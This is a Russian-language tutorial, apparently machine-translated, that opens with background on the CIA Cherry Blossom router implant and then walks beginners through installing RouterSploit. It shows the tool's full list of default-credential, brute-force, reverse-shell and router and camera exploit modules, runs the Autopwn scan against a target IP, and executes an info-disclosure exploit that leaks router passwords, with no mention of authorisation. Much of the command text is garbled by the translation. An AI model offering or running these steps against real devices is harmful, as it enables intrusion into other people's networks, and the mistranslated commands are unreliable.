                  Эти инструменты от АНБ и ЦРУ контролируют целые сети зараженных маршрутизаторов, превращая их в современные локальные беспроводные шпионские устройства.Зачем заводить причудливое шпионское устройство, если можно просто превратить в него домашний роутер?

                  Cherry Blossom — это основной фреймворк для руткиттинга, в котором маршрутизаторы автоматически используются и превращаются в «ловушки для мух». Flytrap — это маршрутизатор, который был взломан и обновлен специальной прошивкой, которая не позволяет пользователю обновлять или изменять новую прошивку.

                  Cherry Blossom может управлять множеством «мухоловок», обеспечивая мгновенный доступ к передовым шпионским устройствам, расположенным в доме или на работе цели. Изображение из Cherry Blossom Quick Start Guide / WikiLeaks / CIA

                  Мухоловка устанавливает «маяк» обратно на командно-управляющий сервер под названием «Cherryweb», а затем ему назначаются «миссии» через зашифрованный VPN-туннель . Усовершенствованные модули, такие как Windex, которые выполняют атаку путем внедрения вредоносного ПО на любую подключенную цель, могут превратить мухоловку в передовую платформу удаленного шпионажа, которой можно управлять из любого места.

                  Cherry Blossom отображает команды миссии, которые должны быть отправлены на устройства flytrap, включая код оболочки, сценарии разведки и эксплойты.Какой-то бедняга получит свою вишневую окраску. Изображение взято с Cherry Blossom Quickstart Guide / WikiLeaks / CIA

                  Преступный Интернет вещей и взлом маршрутизаторов

                  Помимо шпионского приложения, на которое обращает внимание ЦРУ, уязвимые маршрутизаторы и устройства Интернета вещей обычно становятся мишенью из-за их способности к маршрутизации. RouterSploit, инструмент, с которым мы работаем сегодня, не только компрометирует маршрутизаторы, он также может атаковать веб-камеры и другие подключенные устройства.

                  В то время как ЦРУ использует VPN-соединения для сокрытия трафика к серверам управления и контроля и от них, киберпреступники будут использовать эти устройства для проксирования вредоносного трафика, чтобы избежать обнаружения.Фактически, сети этих зараженных маршрутизаторов и устройств IoT продаются как прокси на черном рынке для сокрытия незаконной деятельности, такой как кража кредитных карт, транзакции в даркнете и DDoS-атаки. Не сумев защитить свой маршрутизатор, вы можете подписаться на ретрансляцию трафика криминальным хакерским предприятиям.

                  Большинство людей настраивают маршрутизаторы и забывают о них, не могут изменить настройки по умолчанию, обновить прошивку или иным образом защитить их. Изображение предоставлено nito500 / 123RF

                  Взлом маршрутизатора для начинающих

                  Хотя простая попытка использования пароля по умолчанию является первым шагом к эксплуатации маршрутизатора, существуют более продвинутые структуры даже для новичков.Зачем новичку использовать роутер? На локальном уровне, если вы полностью скомпрометируете маршрутизатор, у вас будет полный доступ к сети. Это позволяет вам контролировать и направлять интернет-соединение цели куда угодно и куда угодно или перенаправлять порты для удаленного доступа.

                  Маршрутизатор следует рассматривать как раннюю и продуктивную цель, с которой нужно бороться на этапах взаимодействия. Даже если вы новичок, простой запуск сканера Autopwn на RouterSploit автоматически проверит ряд уязвимостей в отношении целевого IP-адреса, сокращая процесс поиска потенциального эксплойта до нескольких секунд.

                  Что такое RouterSploit?

                  RouterSploit — это удобная программа на Python, которая автоматизирует большинство задач, связанных с взломом маршрутизатора. Созданный по образцу Metasploit, его команды будут знакомы всем, кто имел дело с фреймворком Metasploit. Он содержит модули сканирования и эксплойтов и доступен для Kali Linux (и macOS или Mac OS X, если хотите).

                  После установления связи с целевой сетью запуск сканирования покажет, можно ли легко использовать маршрутизатор через фреймворк.Сегодня мы рассмотрим функцию Autopwn, чтобы быстро выявлять уязвимости в маршрутизаторах и подключенных устройствах.

                  Целевая страница платформы эксплойтов RouterSploit с параметрами для Autopwn.

                  Начало работы — что вам понадобится

                  RouterSploit великолепен, потому что он работает на Kali Linux, нашей Kali Raspberry Pi, macOS или Mac OS X, Windows и даже на нерутированном телефоне Android. Для начала нам нужно позаботиться о некоторых зависимостях и убедиться, что Python установлен. Кроме того, взлом маршрутизатора никогда не был таким простым с любого устройства, которое у вас есть под рукой.

                  Шаг 1. Установка Python и зависимостей

                  Для продолжения нам нужно убедиться, что у нас установлен Python, а также вам понадобятся некоторые из следующих пакетов.

                  • Python3 (с pip)
                  • Запросы
                  • Paramiko
                  • Beautifulsoup4
                  • Pysnmp
                  • Gnureadline (только для macOS / Mac OS X)

                  Вы можете установить их все, используя

                  9 apt-902 apt-get install python3-pip запрашивает paramiko beautifulsoup4 pysnmp

                  Шаг 2: Установка RouterSploit на Mac, Kali и другие

                  Для установки в Kali Linux откройте окно терминала и введите следующие команды:

                    git clone https: // github.com / угроза9 / routersploit
                  cd routersploit
                  python3 -m pip install -r requirements.txt
                  python3 rsf.py  

                  В macOS или Mac OS X метод аналогичен. В окне терминала введите:

                    git clone https://github.com/threat9/routersploit
                  cd routersploit
                  sudo easy_install pip
                  sudo pip install -r requirements.txt  

                  Шаг 3: Запуск RouterSploit

                  Для нашего первого запуска подключите ваш компьютер к сети с маршрутизатором, который вы хотите просканировать. Перейдите в папку RouterSploit и запустите RouterSploit, введя следующие команды.

                    кд
                  cd routersploit
                  sudo python ./rsf.py  

                  Откроется фреймворк RouterSploit, и вы увидите, что он имеет поразительное сходство с фреймворком Metasploit как по стилю интерфейса, так и по рабочему процессу.

                  Интерфейс командной строки позволяет вводить простые команды для сканирования и использования маршрутизаторов, и вы можете увидеть все, что RouterSploit может предложить, набрав:

                    показать все  

                  Как вы можете видеть в выходных данных ниже, их много эксплойтов, кредитов по умолчанию и сканеров! Как весело.

                    кредитов / generic / snmp_bruteforce
                  creds / generic / telnet_default
                  creds / generic / ssh_default
                  creds / generic / ftp_bruteforce
                  creds / generic / http_basic_digest_bruteforce
                  creds / generic / ftp_default
                  creds / generic / http_basic_digest_default
                  creds / generic / ssh_bruteforce
                  creds / generic / telnet_bruteforce
                  кредиты / маршрутизаторы / ipfire / ssh_default_creds
                  кредиты / маршрутизаторы / ipfire / telnet_default_creds
                  кредиты / маршрутизаторы / ipfire / ftp_default_creds
                  кредиты / маршрутизаторы / bhu / ssh_default_creds
                  кредиты / маршрутизаторы / bhu / telnet_default_creds
                  кредиты / маршрутизаторы / bhu / ftp_default_creds
                  кредиты / маршрутизаторы / linksys / ssh_default_creds
                  кредиты / маршрутизаторы / linksys / telnet_default_creds
                  кредиты / маршрутизаторы / линкис / ftp_default_creds
                  кредиты / маршрутизаторы / technicolor / ssh_default_creds
                  кредиты / маршрутизаторы / technicolor / telnet_default_creds
                  кредиты / маршрутизаторы / technicolor / ftp_default_creds
                  кредиты / маршрутизаторы / asus / ssh_default_creds
                  кредиты / маршрутизаторы / asus / telnet_default_creds
                  кредиты / маршрутизаторы / asus / ftp_default_creds
                  кредиты / маршрутизаторы / миллиард / ssh_default_creds
                  кредиты / маршрутизаторы / миллиард / telnet_default_creds
                  кредиты / маршрутизаторы / миллиард / ftp_default_creds
                  кредиты / маршрутизаторы / zte / ssh_default_creds
                  кредиты / маршрутизаторы / zte / telnet_default_creds
                  кредиты / маршрутизаторы / zte / ftp_default_creds
                  кредиты / маршрутизаторы / ubiquiti / ssh_default_creds
                  кредиты / маршрутизаторы / ubiquiti / telnet_default_creds
                  кредиты / маршрутизаторы / ubiquiti / ftp_default_creds
                  кредиты / маршрутизаторы / asmax / ssh_default_creds
                  кредиты / маршрутизаторы / asmax / telnet_default_creds
                  кредиты / маршрутизаторы / asmax / ftp_default_creds
                  creds / Routers / asmax / webinterface_http_auth_default_creds
                  кредиты / маршрутизаторы / huawei / ssh_default_creds
                  кредиты / маршрутизаторы / Huawei / telnet_default_creds
                  кредиты / маршрутизаторы / Huawei / ftp_default_creds
                  кредиты / маршрутизаторы / tplink / ssh_default_creds
                  кредиты / маршрутизаторы / tplink / telnet_default_creds
                  кредиты / маршрутизаторы / tplink / ftp_default_creds
                  кредиты / маршрутизаторы / netgear / ssh_default_creds
                  кредиты / маршрутизаторы / netgear / telnet_default_creds
                  кредиты / маршрутизаторы / netgear / ftp_default_creds
                  кредиты / маршрутизаторы / mikrotik / ssh_default_creds
                  кредиты / роутеры / микротик / telnet_default_creds
                  кредиты / маршрутизаторы / mikrotik / ftp_default_creds
                  кредиты / маршрутизаторы / микротик / api_ros_default_creds
                  кредиты / маршрутизаторы / movistar / ssh_default_creds
                  кредиты / маршрутизаторы / movistar / telnet_default_creds
                  кредиты / маршрутизаторы / movistar / ftp_default_creds
                  кредиты / маршрутизаторы / dlink / ssh_default_creds
                  кредиты / маршрутизаторы / dlink / telnet_default_creds
                  кредиты / маршрутизаторы / dlink / ftp_default_creds
                  кредиты / маршрутизаторы / можжевельник / ssh_default_creds
                  кредиты / маршрутизаторы / можжевельник / telnet_default_creds
                  кредиты / маршрутизаторы / можжевельник / ftp_default_creds
                  кредиты / маршрутизаторы / comtrend / ssh_default_creds
                  кредиты / маршрутизаторы / comtrend / telnet_default_creds
                  кредиты / маршрутизаторы / comtrend / ftp_default_creds
                  кредиты / маршрутизаторы / fortinet / ssh_default_creds
                  кредиты / маршрутизаторы / fortinet / telnet_default_creds
                  кредиты / маршрутизаторы / fortinet / ftp_default_creds
                  кредиты / маршрутизаторы / белкин / ssh_default_creds
                  кредиты / маршрутизаторы / белкин / telnet_default_creds
                  кредиты / маршрутизаторы / белкин / ftp_default_creds
                  кредиты / маршрутизаторы / netsys / ssh_default_creds
                  кредиты / маршрутизаторы / netsys / telnet_default_creds
                  кредиты / маршрутизаторы / netsys / ftp_default_creds
                  кредиты / маршрутизаторы / pfsense / ssh_default_creds
                  кредиты / маршрутизаторы / pfsense / webinterface_http_form_default_creds
                  кредиты / маршрутизаторы / zyxel / ssh_default_creds
                  кредиты / маршрутизаторы / zyxel / telnet_default_creds
                  кредиты / маршрутизаторы / zyxel / ftp_default_creds
                  кредиты / маршрутизаторы / томсон / ssh_default_creds
                  кредиты / маршрутизаторы / томсон / telnet_default_creds
                  кредиты / маршрутизаторы / томсон / ftp_default_creds
                  кредиты / маршрутизаторы / netcore / ssh_default_creds
                  кредиты / маршрутизаторы / netcore / telnet_default_creds
                  кредиты / маршрутизаторы / netcore / ftp_default_creds
                  кредиты / маршрутизаторы / Cisco / ssh_default_creds
                  кредиты / маршрутизаторы / cisco / telnet_default_creds
                  кредиты / маршрутизаторы / Cisco / ftp_default_creds
                  кредиты / камеры / grandstream / ssh_default_creds
                  кредиты / камеры / grandstream / telnet_default_creds
                  кредиты / камеры / grandstream / ftp_default_creds
                  кредиты / камеры / Basler / ssh_default_creds
                  creds / камеры / basler / webinterface_http_form_default_creds
                  кредиты / камеры / Basler / telnet_default_creds
                  кредиты / камеры / basler / ftp_default_creds
                  кредиты / камеры / avtech / ssh_default_creds
                  кредиты / камеры / avtech / telnet_default_creds
                  кредиты / камеры / avtech / ftp_default_creds
                  кредиты / камеры / Vacron / ssh_default_creds
                  кредиты / камеры / Vacron / telnet_default_creds
                  кредиты / камеры / Vacron / ftp_default_creds
                  кредиты / камеры / acti / ssh_default_creds
                  creds / камеры / acti / webinterface_http_form_default_creds
                  кредиты / камеры / acti / telnet_default_creds
                  кредиты / камеры / acti / ftp_default_creds
                  кредиты / камеры / sentry360 / ssh_default_creds
                  кредиты / камеры / sentry360 / telnet_default_creds
                  кредиты / камеры / sentry360 / ftp_default_creds
                  кредиты / камеры / siemens / ssh_default_creds
                  кредиты / камеры / siemens / telnet_default_creds
                  кредиты / камеры / siemens / ftp_default_creds
                  кредиты / камеры / american_dynamics / ssh_default_creds
                  кредиты / камеры / american_dynamics / telnet_default_creds
                  кредиты / камеры / american_dynamics / ftp_default_creds
                  кредиты / камеры / videoiq / ssh_default_creds
                  кредиты / камеры / videoiq / telnet_default_creds
                  кредиты / камеры / videoiq / ftp_default_creds
                  кредиты / камеры / jvc / ssh_default_creds
                  кредиты / камеры / jvc / telnet_default_creds
                  кредиты / камеры / jvc / ftp_default_creds
                  кредиты / камеры / speco / ssh_default_creds
                  кредиты / камеры / speco / telnet_default_creds
                  кредиты / камеры / speco / ftp_default_creds
                  кредиты / камеры / iqinvision / ssh_default_creds
                  кредиты / камеры / iqinvision / telnet_default_creds
                  кредиты / камеры / iqinvision / ftp_default_creds
                  кредиты / камеры / avigilon / ssh_default_creds
                  кредиты / камеры / авигилон / telnet_default_creds
                  кредиты / камеры / avigilon / ftp_default_creds
                  кредиты / камеры / канон / ssh_default_creds
                  кредиты / камеры / канон / telnet_default_creds
                  кредиты / камеры / канон / ftp_default_creds
                  кредиты / камеры / канон / webinterface_http_auth_default_creds
                  кредиты / камеры / hikvision / ssh_default_creds
                  кредиты / камеры / hikvision / telnet_default_creds
                  кредиты / камеры / hikvision / ftp_default_creds
                  кредиты / камеры / dlink / ssh_default_creds
                  кредиты / камеры / dlink / telnet_default_creds
                  кредиты / камеры / dlink / ftp_default_creds
                  кредиты / камеры / Honeywell / ssh_default_creds
                  кредиты / камеры / Honeywell / telnet_default_creds
                  кредиты / камеры / Honeywell / ftp_default_creds
                  кредиты / камеры / samsung / ssh_default_creds
                  кредиты / камеры / самсунг / telnet_default_creds
                  кредиты / камеры / самсунг / ftp_default_creds
                  кредиты / камеры / ось / ssh_default_creds
                  кредиты / камеры / ось / telnet_default_creds
                  кредиты / камеры / ось / ftp_default_creds
                  creds / камеры / ось / webinterface_http_auth_default_creds
                  кредиты / камеры / arecont / ssh_default_creds
                  кредиты / камеры / arecont / telnet_default_creds
                  creds / камеры / arecont / ftp_default_creds
                  кредиты / камеры / brickcom / ssh_default_creds
                  кредиты / камеры / brickcom / telnet_default_creds
                  кредиты / камеры / brickcom / ftp_default_creds
                  creds / камеры / brickcom / webinterface_http_auth_default_creds
                  кредиты / камеры / mobotix / ssh_default_creds
                  кредиты / камеры / mobotix / telnet_default_creds
                  кредиты / камеры / mobotix / ftp_default_creds
                  кредиты / камеры / geovision / ssh_default_creds
                  кредиты / камеры / geovision / telnet_default_creds
                  кредиты / камеры / geovision / ftp_default_creds
                  кредиты / камеры / stardot / ssh_default_creds
                  кредиты / камеры / stardot / telnet_default_creds
                  кредиты / камеры / stardot / ftp_default_creds
                  кредиты / камеры / cisco / ssh_default_creds
                  кредиты / камеры / cisco / telnet_default_creds
                  кредиты / камеры / cisco / ftp_default_creds
                  полезные нагрузки / perl / bind_tcp
                  полезные нагрузки / perl / reverse_tcp
                  полезные нагрузки / Python / bind_tcp
                  полезные нагрузки / Python / reverse_tcp
                  полезные нагрузки / Python / bind_udp
                  полезные нагрузки / Python / reverse_udp
                  полезные нагрузки / mipsbe / bind_tcp
                  полезные нагрузки / mipsbe / reverse_tcp
                  полезные нагрузки / armle / bind_tcp
                  полезные нагрузки / armle / reverse_tcp
                  полезные нагрузки / x86 / bind_tcp
                  полезные нагрузки / x86 / reverse_tcp
                  полезные нагрузки / php / bind_tcp
                  полезные нагрузки / php / reverse_tcp
                  полезные нагрузки / cmd / php_reverse_tcp
                  полезные нагрузки / cmd / python_reverse_tcp
                  полезные нагрузки / cmd / python_bind_tcp
                  полезные нагрузки / cmd / perl_reverse_tcp
                  полезные нагрузки / cmd / netcat_reverse_tcp
                  полезные нагрузки / cmd / awk_reverse_tcp
                  полезные нагрузки / cmd / awk_bind_tcp
                  полезные нагрузки / cmd / bash_reverse_tcp
                  полезные нагрузки / cmd / php_bind_tcp
                  полезные нагрузки / cmd / awk_bind_udp
                  полезные нагрузки / cmd / netcat_bind_tcp
                  полезные нагрузки / cmd / perl_bind_tcp
                  полезные нагрузки / cmd / python_reverse_udp
                  полезные нагрузки / cmd / python_bind_udp
                  полезные нагрузки / x64 / bind_tcp
                  полезные нагрузки / x64 / reverse_tcp
                  полезные нагрузки / mipsle / bind_tcp
                  полезные нагрузки / mipsle / reverse_tcp
                  сканеры / автогонки
                  сканеры / разное / misc_scan
                  сканеры / маршрутизаторы / router_scan
                  сканеры / камеры / camera_scan
                  эксплойты / общий / shellshock
                  эксплойты / generic / ssh_auth_keys
                  эксплойты / общий / heartbleed
                  эксплойты / разное / asus / b1m_projector_rce
                  эксплойты / разное / wepresent / wipg1000_rce
                  эксплойты / разное / miele / pg8528_path_traversal
                  эксплойты / маршрутизаторы / ipfire / ipfire_oinkcode_rce
                  эксплойты / маршрутизаторы / ipfire / ipfire_proxy_rce
                  эксплойты / маршрутизаторы / ipfire / ipfire_shellshock
                  эксплойты / маршрутизаторы / 2wire / gateway_auth_bypass
                  эксплойты / маршрутизаторы / 2wire / 4011g_5012nv_path_traversal
                  эксплойты / маршрутизаторы / bhu / bhu_urouter_rce
                  эксплойты / маршрутизаторы / linksys / 1500_2500_rce
                  эксплойты / маршрутизаторы / linksys / smartwifi_password_disclosure
                  эксплойты / маршрутизаторы / linksys / wrt100_110_rce
                  эксплойты / маршрутизаторы / linksys / wap54gv3_rce
                  эксплойты / роутеры / technicolor / tg784_authbypass
                  эксплойты / маршрутизаторы / technicolor / tc7200_password_disclosure_v2
                  эксплойты / маршрутизаторы / technicolor / dwg855_authbypass
                  эксплойты / маршрутизаторы / technicolor / tc7200_password_disclosure
                  эксплойты / маршрутизаторы / asus / infosvr_backdoor_rce
                  эксплойты / маршрутизаторы / asus / rt_n16_password_disclosure
                  эксплойты / маршрутизаторы / миллиард / миллиард_5200w_rce
                  эксплойты / маршрутизаторы / миллиард / миллиард_7700nr4_password_disclosure
                  эксплойты / маршрутизаторы / zte / f460_f660_backdoor
                  эксплойты / маршрутизаторы / zte / zxv10_rce
                  эксплойты / маршрутизаторы / ubiquiti / airos_6_x
                  эксплойты / маршрутизаторы / asmax / ar_1004g_password_disclosure
                  эксплойты / маршрутизаторы / asmax / ar_804_gu_rce
                  эксплойты / роутеры / huawei / hg520_info_dislosure
                  эксплойты / роутеры / huawei / hg866_password_change
                  эксплойты / роутеры / huawei / hg530_hg520b_password_disclosure
                  эксплойты / роутеры / huawei / e5331_mifi_info_disclosure
                  эксплойты / роутеры / tplink / wdr740nd_wdr740n_backdoor
                  эксплойты / роутеры / tplink / archer_c2_c20i_rce
                  эксплойты / маршрутизаторы / tplink / wdr740nd_wdr740n_path_traversal
                  эксплойты / маршрутизаторы / tplink / wdr842nd_wdr842n_configure_disclosure
                  эксплойты / маршрутизаторы / netgear / jnr1010_path_traversal
                  эксплойты / маршрутизаторы / netgear / n300_auth_bypass
                  эксплойты / маршрутизаторы / netgear / multi_password_disclosure-2017-5521
                  эксплойты / маршрутизаторы / netgear / dgn2200_dnslookup_cgi_rce
                  эксплойты / маршрутизаторы / netgear / prosafe_rce
                  эксплойты / маршрутизаторы / netgear / r7000_r6400_rce
                  эксплойты / маршрутизаторы / netgear / multi_rce
                  эксплойты / маршрутизаторы / netgear / wnr500_612v3_jnr1010_2010_path_traversal
                  эксплойты / маршрутизаторы / netgear / dgn2200_ping_cgi_rce
                  эксплойты / роутеры / микротик / routeros_jailbreak
                  эксплойты / маршрутизаторы / movistar / adsl_router_bhs_rta_path_traversal
                  эксплойты / маршрутизаторы / dlink / dsp_w110_rce
                  эксплойты / маршрутизаторы / dlink / dgs_1510_add_user
                  эксплойты / маршрутизаторы / dlink / dir_645_815_rce
                  эксплойты / маршрутизаторы / dlink / dir_815_850l_rce
                  эксплойты / маршрутизаторы / dlink / dir_300_320_615_auth_bypass
                  эксплойты / маршрутизаторы / dlink / dir_645_password_disclosure
                  эксплойты / маршрутизаторы / dlink / dir_850l_creds_disclosure
                  эксплойты / маршрутизаторы / dlink / dvg_n5402sp_path_traversal
                  эксплойты / маршрутизаторы / dlink / dsl_2640b_dns_change
                  эксплойты / маршрутизаторы / dlink / dcs_930l_auth_rce
                  эксплойты / маршрутизаторы / dlink / dir_825_path_traversal
                  эксплойты / маршрутизаторы / dlink / multi_hedwig_cgi_exec
                  эксплойты / маршрутизаторы / dlink / dns_320l_327l_rce
                  эксплойты / маршрутизаторы / dlink / dsl_2730_2750_path_traversal
                  эксплойты / маршрутизаторы / dlink / dsl_2750b_info_disclosure
                  эксплойты / маршрутизаторы / dlink / dir_300_600_rce
                  эксплойты / маршрутизаторы / dlink / dwl_3200ap_password_disclosure
                  эксплойты / маршрутизаторы / dlink / dsl_2740r_dns_change
                  эксплойты / маршрутизаторы / dlink / dir_8xx_password_disclosure
                  эксплойты / маршрутизаторы / dlink / dwr_932b_backdoor
                  эксплойты / маршрутизаторы / dlink / dsl_2730b_2780b_526b_dns_change
                  эксплойты / маршрутизаторы / dlink / dwr_932_info_disclosure
                  эксплойты / маршрутизаторы / dlink / dir_300_320_600_615_info_disclosure
                  эксплойты / маршрутизаторы / dlink / dsl_2750b_rce
                  эксплойты / маршрутизаторы / dlink / multi_hnap_rce
                  эксплойты / маршрутизаторы / dlink / dir_300_645_815_upnp_rce
                  эксплойты / маршрутизаторы / 3com / ap8760_password_disclosure
                  эксплойты / маршрутизаторы / 3com / imc_path_traversal
                  эксплойты / маршрутизаторы / 3com / officeconnect_rce
                  эксплойты / маршрутизаторы / 3com / officeconnect_info_disclosure
                  эксплойты / маршрутизаторы / 3com / imc_info_disclosure
                  эксплойты / маршрутизаторы / comtrend / ct_5361t_password_disclosure
                  эксплойты / маршрутизаторы / fortinet / fortigate_os_backdoor
                  эксплойты / маршрутизаторы / мульти / rom0
                  эксплойты / маршрутизаторы / мульти / tcp_32764_rce
                  эксплойты / маршрутизаторы / мульти / misfortune_cookie
                  эксплойты / маршрутизаторы / мульти / tcp_32764_info_disclosure
                  эксплойты / маршрутизаторы / мульти / gpon_home_gateway_rce
                  эксплойты / маршрутизаторы / белкин / g_plus_info_disclosure
                  эксплойты / маршрутизаторы / belkin / play_max_prce
                  эксплойты / маршрутизаторы / belkin / n150_path_traversal
                  эксплойты / роутеры / belkin / n750_rce
                  эксплойты / маршрутизаторы / belkin / g_n150_password_disclosure
                  эксплойты / роутеры / belkin / auth_bypass
                  эксплойты / маршрутизаторы / netsys / multi_rce
                  эксплойты / маршрутизаторы / шаттл / 915wm_dns_change
                  эксплойты / маршрутизаторы / zyxel / d1000_rce
                  эксплойты / маршрутизаторы / zyxel / p660hn_t_v2_rce
                  эксплойты / маршрутизаторы / zyxel / d1000_wifi_password_disclosure
                  эксплойты / маршрутизаторы / zyxel / zywall_usg_extract_hashes
                  эксплойты / маршрутизаторы / zyxel / p660hn_t_v1_rce
                  эксплойты / маршрутизаторы / thomson / twg850_password_disclosure
                  эксплойты / маршрутизаторы / thomson / twg849_info_disclosure
                  эксплойты / маршрутизаторы / netcore / udp_53413_rce
                  эксплойты / маршрутизаторы / cisco / secure_acs_bypass
                  эксплойты / маршрутизаторы / Cisco / Catalyst_2960_rocem
                  эксплойты / маршрутизаторы / Cisco / ucs_manager_rce
                  эксплойты / маршрутизаторы / Cisco / unified_multi_path_traversal
                  эксплойты / маршрутизаторы / cisco / firepower_management60_path_traversal
                  эксплойты / маршрутизаторы / Cisco / firepower_management60_rce
                  эксплойты / маршрутизаторы / cisco / video_surv_path_traversal
                  эксплойты / маршрутизаторы / cisco / dpc2420_info_disclosure
                  эксплойты / маршрутизаторы / cisco / ios_http_authorization_bypass
                  эксплойты / маршрутизаторы / cisco / ucm_info_disclosure
                  эксплойты / камеры / grandstream / gxv3611hd_ip_camera_sqli
                  эксплойты / камеры / grandstream / gxv3611hd_ip_camera_backdoor
                  эксплойты / камеры / mvpower / dvr_jaws_rce
                  эксплойты / камеры / siemens / cvms2025_credentials_disclosure
                  эксплойты / камеры / авигилон / videoiq_camera_path_traversal
                  эксплойты / камеры / xiongmai / uc_httpd_path_traversal
                  эксплойты / камеры / dlink / dcs_930l_932l_auth_bypass
                  эксплойты / камеры / honeywell / hicc_1100pt_password_disclosure
                  эксплойты / камеры / brickcom / corp_network_cameras_conf_disclosure
                  эксплойты / камеры / brickcom / users_cgi_creds_disclosure
                  эксплойты / камеры / мульти / P2P_wificam_credential_disclosure
                  эксплойты / камеры / мульти / dvr_creds_disclosure
                  эксплойты / камеры / мульти / jvc_vanderbilt_honeywell_path_traversal
                  эксплойты / камеры / мульти / netwave_ip_camera_information_disclosure
                  эксплойты / камеры / мульти / P2P_wificam_rce
                  общий / bluetooth / btle_enumerate
                  общий / Bluetooth / btle_scan
                  общий / bluetooth / btle_write
                  общий / upnp / ssdp_msearch
                  rsf>  

                  Для начала мы начнем со сканирования целевого маршрутизатора, которое будет проверять, может ли каждая уязвимость работать против него.Он вернет список в конце сканирования с каждым эксплойтом, который будет работать против цели — исследования не требуется.

                  Шаг 4. Сканирование цели

                  Мы будем использовать сканер Autopwn, чтобы найти любые уязвимости, относящиеся к нашей цели. Найдите IP-адрес маршрутизатора и сохраните его, потому что он нам понадобится для его ввода в ближайшее время. В большинстве случаев адрес маршрутизатора 192.168.0.1. 0.1, но это может измениться. Вы можете использовать Fing или ARP-сканирование, чтобы найти IP-адрес, если вы его не знаете.

                  После запуска RouterSploit войдите в модуль Autopwn, введя следующие команды.

                    использовать сканеры / autopwn
                  показать параметры  

                  Это очень похоже на Metasploit. Чтобы обойти, введите , используйте , а затем любой модуль, который вы хотите использовать, покажите параметры, , чтобы показать переменные этого модуля, который вы выбрали, установите , чтобы установить любую из переменных, которые вы видите в опциях показа команда, и, наконец, запустить для выполнения модуля. Довольно просто. Чтобы выйти из модуля и перейти на главный экран, введите , выход .

                    rsf> использовать сканеры / autopwn
                  rsf (AutoPwn)> показать параметры
                  
                  Целевые параметры:
                  
                     Название Текущие настройки Описание
                     ---- ---------------- -----------
                     target Целевой адрес IPv4 или IPv6
                  
                  Варианты модуля:
                  
                     Название Текущие настройки Описание
                     ---- ---------------- -----------
                     http_port 80 Целевой порт веб-интерфейса
                     http_ssl false Включен HTTPS: true / false
                     ftp_port 21 Целевой порт FTP (по умолчанию: 21)
                     ftp_ssl false Включен FTPS: true / false
                     ssh_port 22 Целевой порт SSH (по умолчанию: 22)
                     telnet_port 23 Целевой порт Telnet (по умолчанию: 23)
                     потоков 8  

                  В этом случае мы установим цель на IP-адрес маршрутизатора.Введите , установите цель , а затем IP-адрес маршрутизатора, затем нажмите Enter. Наконец, введите run , чтобы начать сканирование.

                    rsf (AutoPwn)> установить цель 10.11.0.4
                   [+] {'target': '10 .11.0.4 '}
                  rsf (AutoPwn)> run  

                  Шаг 5: Выбор и настройка эксплойта

                  После завершения сканирования у нас останется список обнаруженных уязвимостей. Мы можем выбрать из этого списка, чтобы решить, какой эксплойт лучше всего подходит для наших нужд. Здесь мы видим роутер со множеством уязвимостей.

                    [*] Истекшее время: `9.301568031 секунда
                  
                  [*] Не удалось проверить возможность использования:
                   - эксплойты / роутеры / миллиард / 5200w_rce
                   - эксплойты / роутеры / cisco / Catalyst_2960_rocem
                   - эксплойты / маршрутизаторы / cisco / secure_acs_bypass
                   - эксплойты / роутеры / dlink / dir_815_8501_rce
                   - эксплойты / роутеры / dlink / dsl_2640b_dns_change
                   - эксплойты / роутеры / dlink / dsl_2730b_2780b_526_dns_change
                   - эксплойты / роутеры / dlink / dsl_2740r_dns_change
                   - эксплойты / роутеры / netgear / dgn2200_dnslookup_cgi_rce
                   - эксплойты / роутеры / шаттл / 915wm_dns_change
                  
                  [*] Устройство уязвимо:
                   - эксплойты / роутеры / 3com / 3crads172_info_disclosure
                   - эксплойты / роутеры / 3com / officialconnect_rce
                   - эксплойты / роутеры / dlink / dcs_9301_auto_rce
                   - эксплойты / роутеры / dlink / dir_300_600_rce
                   - эксплойты / роутеры / ipfire / ipfire_proxy_rce
                   - эксплойты / роутеры / linksys / 1500_2500_rce
                   - эксплойты / маршрутизаторы / netgear / prosafe_rce
                   - эксплойты / роутеры / zyxel / zywall_usg_extract_hashes
                   - эксплойты / роутеры / dlink / dcs_9301_9321_authbypass
                  
                  rsf (AutoPwn)>  

                  Давайте начнем с простого эксплойта на одном из этих уязвимых маршрутизаторов, некоторые из которых раскрывают раскрытие информации.Чтобы использовать этот эксплойт, мы введем следующие команды.

                    используйте эксплойты / маршрутизаторы / 3com / 3cradsl72_info_disclosure
                  показать параметры  

                  Появится список переменных, и вы сможете установить цель, набрав:

                    set target 
                  check  

                  Это установит цель и подтвердит, что она уязвима.

                    rsf (AutoPwn)> используйте эксплойты / маршрутизаторы / 3com / 3cradsl72_info_disclosure
                  показать варианты
                  rsf (3Com 3CRADSL72 Info Disclosure)> показать параметры
                  
                  Целевые параметры:
                  
                     Название Текущие настройки Описание
                     ---- ---------------- -----------
                     target Целевой адрес IPv4 или IPv6
                  
                  rsf (3Com 3CRADSL72 Info Disclosure)> установить цель 10.11.0.4
                   [+] {'target': '10 .11.0.4 '}
                  rsf (3Com 3CRADSL72 Info Disclosure)> проверить
                  /Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7.site-package ... reRequestWarning: выполняется непроверенный запрос HTTPS. Добавление сертификата https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings InsecureRequestWarning)
                   [+] Цель уязвима
                  rsf (3Com 3CRADSL72 Info Disclosure)>  

                  Шаг 6. Запуск эксплойта

                  Цель выглядит хорошо и уязвимой.Чтобы запустить полезную нагрузку, введите и запустите .

                    rsf (3Com 3CRADSL72 Info Disclosure)> запустить
                   [*] Работающий модуль ...
                   [*] Отправка запроса на загрузку конфиденциальной информации
                  /Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7.site-package ... reRequestWarning: выполняется непроверенный запрос HTTPS. Добавление сертификата https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings InsecureRequestWarning)
                   [+] Используйте успех
                   [*] Чтение файла /app_sta.stm
                  
                  
                  
                  
                    
                    
                      

                  Если эксплойт прошел успешно, вы должны увидеть внутренние параметры конфигурации, которые могут привести к утечке логина и пароля пользователей, паролей по умолчанию , серийный номер устройства и другие параметры, позволяющие взломать маршрутизатор.Другие модули позволяют удаленно вводить код или напрямую раскрывать пароль маршрутизатора. То, что вы можете запустить, зависит от того, к чему уязвим целевой маршрутизатор.

                  Предупреждения

